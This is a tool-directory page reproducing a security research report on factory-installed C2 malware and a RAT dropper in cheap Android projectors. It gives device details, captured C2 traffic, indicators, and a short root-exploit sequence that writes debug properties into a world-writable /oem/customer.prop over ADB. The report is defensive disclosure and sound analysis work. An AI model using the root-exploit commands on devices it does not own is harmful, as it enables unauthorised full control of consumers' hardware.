Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/kavan00/android-projector-c2-malware
Android SecurityEmbedded Systems SecurityIndicator of Compromise (IOC) ManagementIoT SecurityNetwork ForensicsReverse EngineeringMalware AnalysisDigital ForensicsCommand and ControlThreat IntelligenceSupply Chain SecurityFirmware Analysis
GitHubkavan00/android-projector-c2-malware

Android-Projector-C2-Malware

Breakdown of a c2-network of chinese beamers - SilentSDK-Analysis

View Repository
182655 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Pre-installed C2 Infrastructure and RAT Payload on Android Projectors

Technical Analysis Report — Security Research


Affected Devices: Multiple Android projectors of beamer brands like the Nonete (e.g., Model HY260Pro) (likely also several projectors from Magcubic, Hotack, Huyukang and many more, as these companies distribute similar models and there are indications supporting this)
Chipset Platform: Allwinner H713 / sun50iw12p1 — potentially affects all devices on this platform
Analysis Period: April 11–17, 2026
Classification: Pre-installed Command-and-Control infrastructure with Remote Access Trojan payload


TL;DR

  • The Problem: Numerous cheap Android projectors (potentially brands like Magcubic, Hotack, etc., utilizing the Allwinner H713 chip), currently sold in massive quantities on Amazon, eBay, and AliExpress, are infected with malware straight from the factory (Supply Chain Attack, similar to the "BADBOX" cases).
  • The Mechanism: A seemingly harmless system app ("StoreOS") acts as a disguised dropper. It completely silently downloads a Stage-2-Dropper named "SilentSDK" in the background and installs it with maximum system privileges, which in turn installs a modular, plugin-based, architechture aware RAT & possibly phishing framework.
  • The Danger: The malware establishes a C2 connection to China (api.pixelpioneerss.com), extracts sensitive device IDs, and can download and execute arbitrary additional malicious code with root privileges at any time (chmod 777). Additionally, the devices feature open root backdoors.
  • Immediate Mitigation: The C2 domains (especially *.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) must be blocked at the network level. Affected users can only disable the malicious apps manually via ADB, as they are deeply embedded in the system.

Urgency Notice

The malware infrastructure documented in this report is pre-installed on Android projectors currently being sold in large quantities to end consumers on Amazon, eBay, and AliExpress. The affected devices span possibly multiple brand names (Hotack, Huyukang, Magcubic, Nonete, among others). Identical C2 infrastructure has been independently confirmed on other devices from the same manufacturer (see Section 13). The pattern matches the BADBOX cases.


Table of Contents

  1. Device Identification
  2. Investigation Workflow
  3. Root Access — Exploit Path
  4. C2 Server Response — Core Evidence
  5. Malware Ecosystem Overview
  6. StoreOS — Dropper Analysis (com.htc.storeos)
  7. EventUploadService — Telemetry (com.htc.eventuploadservice)
  8. ExpandSDK — Ad-Injection (com.htc.expandsdk)
  9. SilentSDK — Stage-2-Dropper Analysis (com.hotack.silentsdk)
  10. The Malware
  11. System Backdoors
  12. Network Forensics
  13. Device Spoofing (Build-Fingerprint Spoofing)
  14. External Confirmation
  15. Indicators of Compromise (IOCs)
  16. MITRE ATT&CK Mapping
  17. Immediate Mitigations
  18. Sources

Purchased Device: Amazon Link - Nonete Mini Beamer 4K 1080P


1. Device Identification

PropertyValue
Brand NameNonete HY260Pro (model sold by multiple companies)
Internal Model NameNT10
SoCAllwinner sun50iw12p1 (ARM 32-bit)
Operating SystemSpectraOS (Android 11, Kernel 5.4.99)
Real Build FingerprintAllwinner/h713_tuna_p3/h713-tuna_p3:11
Spoofed Build FingerprintADT-3/adt3/adt3:11/RP1A.201005.006
SELinuxPermissive (no enforcement)
Platform Signing KeyPublic AOSP Test Key
OEM CertificateCN=蓝鲨, OU=www.bsh.me, C=CN
Firmware ChannelHY260Pro_SpectraOS_TPYB

Note on scope: The Allwinner H713 chipset is built into numerous cheap Android projectors sold under changing brand names in the European market. The identical firmware base (h713_tuna_p3) and identical C2 operator (Shenzhen Aodin Technology) strongly suggest that all devices from this OEM contain the same infrastructure.


2. Investigation Workflow

StepActionResult
1Wireshark capture of network trafficHTTP traffic to store-api.aodintech.com
2Decoding of the gzip-compressed C2 response7 apps, including hidden "SilentTools"
3AES-CBC decryption of the download pathKey [REDACTED], URL to .bpp file
4Root exploit via /oem/customer.propuid=0(root) after property injection
5Forensic dump of /data, /oem, /systemAPKs, databases, configurations
6Static analysis of StoreOS DEXpm install -r -d, byte-reversal protection
7Reverse engineering the reverseLen mechanismUnderstanding of the anti-analysis protection
8Breaking the byte-reversal protectionDecrypted, analyzable SilentSDK DEX
9XOR decryption of SilentSDK stringsC2 domain api.pixelpioneerss.com confirmed
10Hash verification across three sourcesMD5/SHA-256 match perfectly
11Reverse engineering the malware download processServers still online
12Reverse engineering the malwarePlugin-based Rat Framework

3. Root Access — Exploit Path

Root access was achieved through a combination of three vulnerabilities:

  1. SELinux Permissive — Access violations are only logged, not blocked.
  2. World-writable /oem — The partition is mounted as FAT with fmask=0000.
  3. customer.prop loaded at boot — Overwrites system properties.
adb shell getenforce                  # Result: Permissive
adb shell ls -la /oem/                # All files world-writable

adb shell 'echo "ro.debuggable=1"     >> /oem/customer.prop'
adb shell 'echo "service.adb.root=1"  >> /oem/customer.prop'
adb shell 'echo "ro.secure=0"         >> /oem/customer.prop'

adb reboot && adb wait-for-device && adb root
adb shell id
# uid=0(root) gid=0(root) context=u:r:su:s0

Impact: Any user with physical access or an attacker on the same network (via ADB, port 5555 open, no authentication) gains full root access.


4. C2 Server Response — Core Evidence

Captured HTTP Request

POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12

Server Response (Decoded from pcapng - Table)

The gzip-compressed response contains a JSON list with seven apps. Six of them are regular streaming apps (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). The seventh is SilentTools:

AppPackageisShowisForceisSilent InstallisSilent Uninstalllaunch Type
YouTubecom.google.android.youtube.tvtruefalsefalsefalse0
Disney+com.disney.disneyplustruefalsefalsefalse0
Netflixcom.netflix.mediaclienttruefalsefalsefalse0
Chromecom.android.chrometruefalsefalsefalse0
Prime Videocom.amazon.amazonvideo.livingroomtruefalsefalsefalse0
BrowseHerecom.tcl.browsertruefalsefalsefalse0
SilentToolscom.hotack.silentsdkfalsetruefalsetrue1

SilentTools Configuration in Detail

Download Tool